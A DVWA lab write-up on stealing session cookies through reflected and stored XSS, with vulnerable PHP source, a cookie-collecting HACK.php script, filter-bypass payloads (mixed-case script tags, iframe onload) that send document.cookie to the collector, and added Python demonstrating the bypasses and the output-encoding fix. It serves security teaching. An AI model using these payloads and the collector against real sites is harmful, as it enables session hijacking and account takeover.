DVWA: stealing cookies via XSS
Reflected
I. LOW
1. The victim is logged in to http://127.0.0.1/DVWA/vulnerabilities/xss_r/, a site with an XSS vulnerability.
The site's source code is as follows; it applies no filtering at all:
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Feedback for end user
echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>
2. The attacker sets up a site at http://127.0.0.1/xss/ and creates HACK.php there with the following code:
<?php
$cookie = $_GET['x'];
file_put_contents('cookie.txt', $cookie);
?>
3. Lead the victim to the address below, URL-encoding <script>document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie;</script> where necessary.
http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=<script>document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie;</script>
4. The victim's cookie for http://127.0.0.1/DVWA/vulnerabilities/xss_r/ is obtained.
II. MEDIUM
Site source code:
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = str_replace( '<script>', '', $_GET[ 'name' ] );
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
?>
It filters out <script>; bypass it with mixed case:
http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=<Script>document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie;</scRipt>
III. HIGH
Source code:
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
?>
This filters every possible form of the <script> tag. Use a different tag instead, such as <iframe onload=alert('haha')>:
http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=<iframe onload=(document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie)>
The cookie is obtained successfully.
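The three reflected-XSS filters above, ported to Python and run against the page's own payloads, beside the output-encoding fix that makes all of them inert. This is an added example, not DVWA code; html.escape() stands in for PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), and opens_tag() is a deliberately crude stand-in for a browser.

```python
"""Added example, not part of the DVWA source above: a Python port of the
three reflected-XSS filters on this page, run against the page's own payloads,
beside the output-encoding fix that makes all of them inert. html.escape() is
the closest equivalent of PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8')."""
import html
import re

# The page's three payloads, exactly as written.
PAYLOAD_LOW = "<script>document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie;</script>"
PAYLOAD_MEDIUM = "<Script>document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie;</scRipt>"
PAYLOAD_HIGH = "<iframe onload=(document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie)>"

def filter_low(name: str) -> str:
    return name                               # LOW: no filtering at all

def filter_medium(name: str) -> str:
    return name.replace("<script>", "")       # MEDIUM: exact, case-sensitive str_replace

# HIGH: preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name); Python's re has
# the same greedy, case-insensitive semantics for this pattern.
_HIGH_RE = re.compile(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", re.IGNORECASE)

def filter_high(name: str) -> str:
    return _HIGH_RE.sub("", name)

def render_unsafe(filt, name: str) -> str:
    """DVWA's echo '<pre>Hello ' . $name . '</pre>' after the level's filter."""
    return "<pre>Hello " + filt(name) + "</pre>"

def render_safe(name: str) -> str:
    """The fix: encode for the HTML context at output time, with no blacklist.
    PHP writes the quote as &#039;, Python as &#x27;; both are inert."""
    return "<pre>Hello " + html.escape(name, quote=True) + "</pre>"

def opens_tag(rendered: str) -> bool:
    """True if the user-controlled part still opens an HTML tag (a '<' followed
    by a letter). A lone '>' or a stray '</script>' cannot execute anything."""
    inner = rendered[len("<pre>Hello "):-len("</pre>")]
    return re.search(r"<[A-Za-z]", inner) is not None

def bypass_table() -> dict:
    """Which payload still opens a tag after which level's filter."""
    levels = {"low": filter_low, "medium": filter_medium, "high": filter_high}
    payloads = {"low": PAYLOAD_LOW, "medium": PAYLOAD_MEDIUM, "high": PAYLOAD_HIGH}
    return {(lv, pl): opens_tag(render_unsafe(f, p))
            for lv, f in levels.items() for pl, p in payloads.items()}

if __name__ == "__main__":
    for (lv, pl), fires in sorted(bypass_table().items()):
        print(f"{lv:6} filter vs {pl:6} payload: {'BYPASSED' if fires else 'blocked'}")
```

Each level's filter blocks the previous level's payload and nothing more, while the escaped rendering opens no tag for any of them.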
Stored
1. LOW
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitize name input
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
trim() removes whitespace from both ends of a string.
stripslashes() removes backslashes from a string.
mysqli_real_escape_string() escapes the characters that are special in an SQL statement.
From the source, the name and message inputs are only escaped against SQL injection; nothing filters or encodes them for safe output in HTML.
The escaping only protects the INSERT statement: the value stored in the database is the original string, so when it is read back and echoed, any special characters keep their meaning in the page.
Enter the following in the name box:
<script>document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie;</script>
From then on, every visit to this page sends back the cookie.
To repeat the experiment, delete the stored rows from the MySQL database.
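An added example (not DVWA code) of the point just made: escaping for the SQL context does nothing for the HTML context. It uses an in-memory sqlite3 table in place of DVWA's MySQL guestbook and bound parameters in place of mysqli_real_escape_string, stores the page's payload, and shows that the stored value is identical to the input, so the render step is where the payload either fires on every view or is neutralised.

```python
"""Added example, not DVWA code: why SQL escaping does nothing for stored XSS.
An in-memory sqlite3 guestbook stands in for DVWA's MySQL table, and bound
parameters stand in for mysqli_real_escape_string (the parameters also close
the SQL-injection side properly). The stored value is shown to be identical to
the input; only the render step decides whether the stored tag executes."""
import html
import sqlite3

# The page's stored-XSS LOW payload, typed into the name box.
STORED_PAYLOAD = "<script>document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie;</script>"

def new_guestbook() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE guestbook (comment TEXT, name TEXT)")
    return db

def sign(db: sqlite3.Connection, name: str, message: str) -> None:
    # Bound parameters: the driver handles quoting, so a quote in the input
    # cannot break the statement, and nothing is escaped *into* the value.
    db.execute("INSERT INTO guestbook (comment, name) VALUES (?, ?)", (message, name))

def rows(db: sqlite3.Connection) -> list:
    return db.execute("SELECT comment, name FROM guestbook").fetchall()

def render_unsafe(db: sqlite3.Connection) -> str:
    """DVWA LOW behaviour: stored strings are echoed as-is, so a stored tag
    is re-sent to every visitor who loads the guestbook afterwards."""
    return "".join(f"<div>Name: {name}<br>Message: {comment}</div>"
                   for comment, name in rows(db))

def render_safe(db: sqlite3.Connection) -> str:
    """The fix: encode for the HTML context when the value leaves the database."""
    return "".join(f"<div>Name: {html.escape(name)}<br>Message: {html.escape(comment)}</div>"
                   for comment, name in rows(db))

def demo() -> dict:
    db = new_guestbook()
    sign(db, STORED_PAYLOAD, "hi")                        # the attacker's entry
    sign(db, "O'Brien", "a quote that must not break the INSERT")  # a normal visitor
    stored_name = rows(db)[0][1]
    return {
        "stored_identical": stored_name == STORED_PAYLOAD,   # the DB holds the raw markup
        "unsafe_fires": "<script>" in render_unsafe(db),      # on this view and every later one
        "safe_inert": "<script>" not in render_safe(db) and "&lt;script&gt;" in render_safe(db),
        "row_count": len(rows(db)),
    }
```

Because every payload on this page reads document.cookie, marking the session cookie HttpOnly keeps it out of reach of injected script; that limits the impact but does not remove the XSS, which only output encoding does.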
2. MEDIUM
Stored XSS source:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = str_replace( '<script>', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
strip_tags() removes HTML tags.
htmlspecialchars() converts the predefined characters into HTML entities.
str_replace() replaces a given character or substring with another; here it replaces <script> with an empty string. Its weakness is that the match is case-sensitive.
The source shows that message has its tags stripped and its predefined characters converted to entities, while name only has <script> removed. So the XSS attack goes through name.
Enter the following in the name box:
<Script>document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie;</Script>
From then on, every visit to this page sends back the cookie.
3. HIGH
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
- Compared with the medium level, this source adds one more filter on the name value: preg_replace(), whose case-insensitive regular expression defeats mixed case and interleaved extra characters.
- The filter is decent, but if we simply stop using a payload like the low and medium ones, it is bypassed. We construct the payload:
<iframe onload=(document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie)>
From then on, every visit to this page sends back the cookie.